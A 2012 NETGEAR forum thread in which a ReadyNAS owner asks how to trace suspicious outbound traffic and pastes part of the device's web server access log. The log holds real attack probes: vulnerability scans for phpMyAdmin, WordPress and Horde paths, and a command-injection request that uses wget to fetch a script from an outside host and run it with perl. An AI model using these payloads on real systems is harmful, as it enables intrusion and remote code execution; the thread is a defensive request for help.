NETGEAR is aware of a growing number of phone and online scams. To learn how to stay safe click here.
Forum Discussion
How do I find out who is accessing data on my NAS?
I have noticed that on several occasions recently a large amount of traffic streaming from my NAS to the router. I am not aware of any local processes running at the time this happens as all PC's are shut down.
As a "security" measure I have unplugged the link when I see this happening. Is there anything I can do to find out what process/user/device is actually doing this. It is a little disconcerting that data may be streaming out to somewhere outside my LAN without my knowledge. The NAS has CIFS/DLNA/FTP enabled. FTP is for named users only and only Group and Users are enabled in Advanced settings with valid users itemised in specific shares. Accessing as different users does reveal only those shares specified. No "Anonymous" access is granted.
Can anyone advise me as to how to find out who/what is happening???
This is a second attempt to get a response to this question.
As a "security" measure I have unplugged the link when I see this happening. Is there anything I can do to find out what process/user/device is actually doing this. It is a little disconcerting that data may be streaming out to somewhere outside my LAN without my knowledge. The NAS has CIFS/DLNA/FTP enabled. FTP is for named users only and only Group and Users are enabled in Advanced settings with valid users itemised in specific shares. Accessing as different users does reveal only those shares specified. No "Anonymous" access is granted.
Can anyone advise me as to how to find out who/what is happening???
This is a second attempt to get a response to this question.
6 Replies
Replies have been turned off for this discussion
- Perhaps your router has logs? Also as far as "security" measures, some routers let you control internet access by time of day. If you are using standard ports for FTP, you might change them to non-standard ports. Changing user passwords might also be a good idea.
Are the users on your home network or are they remote? - Thanks for responding Stephen!
Users are remote, scattered around Europe. Most data is encrypted and user passwords are quite restrictive. I cannot see any log relating to access nor can I find any means of enabling logging for user accesses. I am unable to time-limit users as this would affect work. NAS is 8TB Ultra 4+ - ok. So it is possible that the access is legitimate?
Also, are the remote users using FTP or ReadyNas remote (or both).
I am not aware of a way to see user logons, I agree these should be logged somewhere. - There should be a log (ftp.log I think) in the logs zip file (Status > Logs > Download all logs) with the information you need. I think there's a FTPWHO community add-on as well which you may find useful.
If you have SSH access you can look at /var/log/proftpd.log (this is the ftp log included in the logs zip file). - Access is thro' FTP. Users are defined for specific shares.
Yes! There should be a log for users accessing the system but I cannot find it. - I read the FTP log and found it to contain nothing of relevance. All logins were valid.
Here is part of the HTTPD Log. It makes for interesting reading I am sure but can anyone tell me what it is saying? There are a lot of strange IP addresses hitting the system (if that is what it is saying) but HTTP is not enabled for any share. I can recognize Google and aiHit plus DNS services but who are the rest and what are they doing?
Any info would be useful.
112.197.2.15 - - [29/Jan/2012:20:32:59 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 247 "-" "ZmEu"
112.197.2.15 - - [29/Jan/2012:20:32:59 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 231 "-" "ZmEu"
112.197.2.15 - - [29/Jan/2012:20:33:00 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 234 "-" "ZmEu"
::1 - - [29/Jan/2012:20:33:01 +0000] "GET /" 400 456 "-" "-"
61.250.80.133 - - [29/Jan/2012:21:44:30 +0000] "GET /user/soapCaller.bs HTTP/1.1" 302 224 "-" "Morfeus Fucking Scanner"
204.8.135.12 - - [30/Jan/2012:04:27:40 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
62.117.99.45 - - [30/Jan/2012:04:43:33 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
207.109.164.19 - - [30/Jan/2012:05:20:24 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
210.42.74.40 - - [30/Jan/2012:05:32:06 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
64.139.216.71 - - [30/Jan/2012:18:56:52 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
95.108.247.252 - - [30/Jan/2012:19:07:33 +0000] "GET /robots.txt HTTP/1.1" 302 218 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
218.201.87.23 - - [30/Jan/2012:19:16:00 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
77.222.128.221 - - [31/Jan/2012:01:33:34 +0000] "GET /robots.txt HTTP/1.1" 302 222 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
77.222.128.221 - - [31/Jan/2012:01:33:36 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
77.222.128.221 - - [31/Jan/2012:01:33:37 +0000] "GET / HTTP/1.1" 302 212 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
77.222.128.221 - - [31/Jan/2012:01:33:38 +0000] "GET / HTTP/1.1" 200 115 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
77.222.128.221 - - [31/Jan/2012:01:33:39 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
::1 - - [31/Jan/2012:01:33:41 +0000] "GET /" 400 456 "-" "-"
95.108.247.252 - - [31/Jan/2012:02:50:35 +0000] "GET / HTTP/1.1" 302 208 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
193.40.1.220 - - [31/Jan/2012:02:55:00 +0000] "GET / HTTP/1.1" 302 206 "-" "Python-urllib/2.6"
193.40.1.220 - - [31/Jan/2012:02:55:00 +0000] "GET / HTTP/1.1" 200 115 "-" "Python-urllib/2.6"
66.249.72.142 - - [31/Jan/2012:03:51:45 +0000] "GET /robots.txt HTTP/1.1" 302 218 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.178 - - [31/Jan/2012:03:51:45 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.142 - - [31/Jan/2012:03:51:45 +0000] "GET / HTTP/1.1" 302 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.178 - - [31/Jan/2012:03:51:45 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.178 - - [31/Jan/2012:03:51:45 +0000] "GET / HTTP/1.1" 200 115 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.178 - - [31/Jan/2012:03:51:46 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
::1 - - [31/Jan/2012:03:51:50 +0000] "GET /" 400 456 "-" "-"
203.234.219.77 - - [31/Jan/2012:04:06:15 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
193.40.1.220 - - [31/Jan/2012:06:29:01 +0000] "GET / HTTP/1.1" 302 206 "-" "Python-urllib/2.6"
193.40.1.220 - - [31/Jan/2012:06:29:01 +0000] "GET / HTTP/1.1" 200 115 "-" "Python-urllib/2.6"
66.249.72.218 - - [31/Jan/2012:06:40:13 +0000] "GET /robots.txt HTTP/1.1" 302 222 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [31/Jan/2012:06:40:15 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.218 - - [31/Jan/2012:06:40:15 +0000] "GET / HTTP/1.1" 302 212 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [31/Jan/2012:06:40:15 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [31/Jan/2012:06:40:15 +0000] "GET / HTTP/1.1" 200 115 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [31/Jan/2012:06:40:15 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
::1 - - [31/Jan/2012:06:40:18 +0000] "GET /" 400 456 "-" "-"
::1 - - [31/Jan/2012:06:40:19 +0000] "GET /" 400 456 "-" "-"
92.39.50.14 - - [31/Jan/2012:11:50:20 +0000] "GET /wp-login.php HTTP/1.0" 302 220 "-" "-"
66.249.72.178 - - [31/Jan/2012:12:20:16 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.178 - - [31/Jan/2012:12:20:17 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.204.224 - - [31/Jan/2012:22:58:15 +0000] "GET /robots.txt HTTP/1.1" 302 218 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.204.224 - - [31/Jan/2012:22:58:16 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.204.224 - - [31/Jan/2012:22:59:13 +0000] "GET /shares/ HTTP/1.1" 302 215 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.204.224 - - [31/Jan/2012:22:59:14 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
202.99.122.185 - - [01/Feb/2012:04:01:11 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
192.168.1.25 - - [01/Feb/2012:14:48:14 +0000] "GET /admin/ HTTP/1.1" 302 211 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"
::1 - - [01/Feb/2012:14:48:17 +0000] "GET /" 400 456 "-" "-"
70.161.177.214 - - [02/Feb/2012:02:29:51 +0000] "GET /robots.txt HTTP/1.1" 302 222 "-" "panscient.com"
70.161.177.214 - - [02/Feb/2012:02:29:51 +0000] "GET / HTTP/1.1" 302 212 "-" "panscient.com"
61.183.23.146 - - [02/Feb/2012:19:50:54 +0000] "HEAD /manager/html HTTP/1.0" 302 - "-" "-"
65.52.108.142 - - [03/Feb/2012:01:00:39 +0000] "GET /robots.txt HTTP/1.1" 302 218 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.108.142 - - [03/Feb/2012:01:00:40 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.108.142 - - [03/Feb/2012:01:01:12 +0000] "GET / HTTP/1.1" 302 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.108.142 - - [03/Feb/2012:01:01:12 +0000] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
95.108.245.253 - - [03/Feb/2012:01:33:26 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
78.29.15.137 - - [03/Feb/2012:06:46:04 +0000] "POST /admin/login.php HTTP/1.1" 302 223 "-" "-"
95.108.245.253 - - [03/Feb/2012:07:53:40 +0000] "GET / HTTP/1.1" 200 115 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
65.39.251.195 - - [03/Feb/2012:15:33:13 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
67.212.72.210 - - [04/Feb/2012:01:06:15 +0000] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
67.212.72.210 - - [04/Feb/2012:01:06:15 +0000] "GET /recordings/index.php HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.209.192.31 - - [04/Feb/2012:01:25:16 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/ieh1%20http://abctel.nl/i.txt HTTP/1.1" 302 332 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
91.209.192.31 - - [04/Feb/2012:01:25:31 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/i.txt HTTP/1.1" 302 284 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
91.209.192.31 - - [04/Feb/2012:01:25:31 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/i.txt HTTP/1.1" 302 284 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
91.209.192.31 - - [04/Feb/2012:01:25:31 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/i.txt HTTP/1.1" 302 284 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
91.209.192.31 - - [04/Feb/2012:01:25:32 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/i.txt HTTP/1.1" 302 284 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
91.209.192.31 - - [04/Feb/2012:01:25:32 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/i.txt HTTP/1.1" 302 284 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
::1 - - [04/Feb/2012:01:25:33 +0000] "GET /" 400 456 "-" "-"
::1 - - [04/Feb/2012:01:25:34 +0000] "GET /" 400 456 "-" "-"
::1 - - [04/Feb/2012:01:25:35 +0000] "GET /" 400 456 "-" "-"
94.24.40.205 - - [04/Feb/2012:07:38:44 +0000] "GET /admin/cdr/counter.txt HTTP/1.1" 401 401 "-" "-"
200.196.48.40 - - [04/Feb/2012:09:49:01 +0000] "GET //README HTTP/1.1" 302 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:01 +0000] "GET /horde//README HTTP/1.1" 302 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:02 +0000] "GET /horde2//README HTTP/1.1" 302 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:03 +0000] "GET /horde3//README HTTP/1.1" 302 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:03 +0000] "GET /horde-3.0.5//README HTTP/1.1" 302 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:04 +0000] "GET /horde-3.0.6//README HTTP/1.1" 302 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:04 +0000] "GET /horde-3.0.7//README HTTP/1.1" 302 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:05 +0000] "GET /horde-3.0.8//README HTTP/1.1" 302 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:06 +0000] "GET /horde-3.0.9//README HTTP/1.1" 302 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:06 +0000] "GET /mail//README HTTP/1.1" 302 219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:07 +0000] "GET /email//README HTTP/1.1" 302 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:07 +0000] "GET /webmail//README HTTP/1.1" 302 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:08 +0000] "GET /newmail//README HTTP/1.1" 302 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:08 +0000] "GET /mails//README HTTP/1.1" 302 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.196.48.40 - - [04/Feb/2012:09:49:09 +0000] "GET /mailz//README HTTP/1.1" 302 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
NETGEAR Academy
Boost your skills with the Netgear Academy - Get trained, certified and stay ahead with the latest Netgear technology!
Join Us!
